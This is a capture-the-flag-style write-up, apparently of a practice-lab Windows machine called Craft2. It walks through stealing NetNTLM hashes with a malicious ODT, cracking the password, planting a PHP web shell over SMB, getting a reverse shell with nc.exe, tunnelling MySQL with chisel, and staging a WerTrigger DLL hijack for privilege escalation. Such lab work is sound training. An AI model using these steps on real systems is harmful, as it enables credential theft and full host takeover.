$ nmap -p- --min-rate 4000 192.168.197.188
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-05 23:51 +08
Nmap scan report for 192.168.197.188
Host is up (0.17s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
49666/tcp open unknown
This is a continuation of the original Craft machine, and it appears that SMB is open for this machine. The last machine was pretty minimalist, so I think we might need this later.
ODT Macro Fail -> NTLM Steal
The website is largely the same as the previous one. However, when we try to upload a ODT file, we get some additional information:
It appears that macros will not work again. Since SMB is open on this machine, I googled 'LibreOffice SMB Exploit' and this was the first result:
There was a public exploit available for it, and I found that rather interesting. Using searchsploit returns the exploit PoC:
$ searchsploit libreoffice information disclosure
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
LibreOffice/Open Office - '.odt' Information Disclosure | windows/local/44564.py
----------------------------------------------------------- ---------------------------------
When using it, it states that we can steal NetNTLM creds using this:
$ python2 44564.py
____ __ ____ ____ ______
/ __ )____ _____/ / / __ \/ __ \/ ____/
/ __ / __ `/ __ /_____/ / / / / / / /_
/ /_/ / /_/ / /_/ /_____/ /_/ / /_/ / __/
/_____/\__,_/\__,_/ \____/_____/_/
Create a malicious ODF document help leak NetNTLM Creds
By Richard Davy
@rd_pentest
www.secureyourit.co.uk
Please enter IP of listener: 192.168.45.197
The script also generates the file bad.odt for us to upload. I started a responder instance and uploaded the file. After a while, responder would capture a hash:
This hash can be cracked immediately to get the password for the user:
$ john --wordlist=/usr/share/wordlists/rockyou.txt ntlm_hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
winniethepooh (thecybergeek)
1g 0:00:00:00 DONE (2023-07-05 23:58) 100.0g/s 409600p/s 409600c/s 409600C/s slimshady..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
SMB Shares -> Upload Web Shell
There wasn't SSH or WinRM open on the system, so instead, let's try to enumerate SMB using these credentials.
smbmap reveals that we can read some shares:
$ smbmap -u thecybergeek -p winniethepooh -H 192.168.197.188
[+] IP: 192.168.197.188:445 Name: 192.168.197.188
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
WebApp READ ONLY
The WebApp one looked like the next stage. We can connect to it and view the files:
$ smbclient -U thecybergeek //192.168.197.188/WebApp
Password for [WORKGROUP\thecybergeek]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Apr 6 00:16:03 2022
.. D 0 Wed Apr 6 00:16:03 2022
assets D 0 Wed Apr 6 00:16:03 2022
css D 0 Wed Apr 6 00:16:03 2022
index.php A 9768 Tue Feb 1 00:21:52 2022
js D 0 Wed Apr 6 00:16:03 2022
upload.php A 896 Mon Jan 31 23:23:02 2022
uploads D 0 Wed Jul 5 23:57:54 2023
The previous machine Craft allowed us to upload webshells to the web directory, and it works here too:
smb: \> put cmd.php
putting file cmd.php as \cmd.php (0.1 kb/s) (average 0.1 kb/s)
$ curl http://192.168.197.188/cmd.php?cmd=whoami
craft2\apache
We can then easily get a reverse shell by downloading nc.exe onto the machine and executing it.
Privilege Escalation
This time, the apache user had no abusable privileges, and there was nothing much about the current user.
RunasCs.exe -> Lateral Movement Fail
We still had thecybergeek password, and this is abusable using RunasCs.exe.
Interesting. We can forward this using chisel.exe.
## on kalichiselserver-p6000--reverse## on victimchisel.execlient192.168.45.197:6000R:3306:127.0.0.1:3306
Then, we can access the MySQL database:
$ mysql -h 127.0.0.1 -uroot
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 9
Server version: 10.4.19-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
However, there was literally nothing in the database. Instead, let's view our privileges:
MariaDB [test]> show grants;
+---------------------------------------------------------------------+
| Grants for root@localhost |
+---------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` WITH GRANT OPTION |
| GRANT PROXY ON ''@'%' TO 'root'@'localhost' WITH GRANT OPTION |
+---------------------------------------------------------------------+
We seem to have all privileges enabled on the machine, and we can also read all files on the machine:
This was interesting, because it confirmed that we are running MySQL as the Administrator. However, we cannot execute commands as the exec module is just not present within the machine:
MariaDB [mysql]> select * from mysql.func;
Empty set (0.176 sec)
Since we can use load_file, this means we can also move files all over the place, giving us privileged file write over the machine:
MariaDB [mysql]> select load_file('C:/Users/Administrator/Desktop/proof.txt') into dumpfile "C:\\root.txt"
This opens up quite a few exploits to getting an administrator shell, such as the WerTrigger exploit.
To exploit this, we would need to have these files within a directory we control:
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5C30-DCD7
Directory of C:\temp
07/05/2023 09:25 AM <DIR> .
07/05/2023 09:25 AM <DIR> ..
07/05/2023 09:25 AM 45,272 nc.exe
07/05/2023 09:23 AM 12,288 phoneinfo.dll
07/05/2023 09:24 AM 9,252 Report.wer
07/05/2023 09:24 AM 15,360 WerTrigger.exe
4 File(s) 82,172 bytes
2 Dir(s) 7,268,442,112 bytes free
Afterwards, using the MySQL instance, we can place the phoneinfo.dll file into C:\Windows\System32.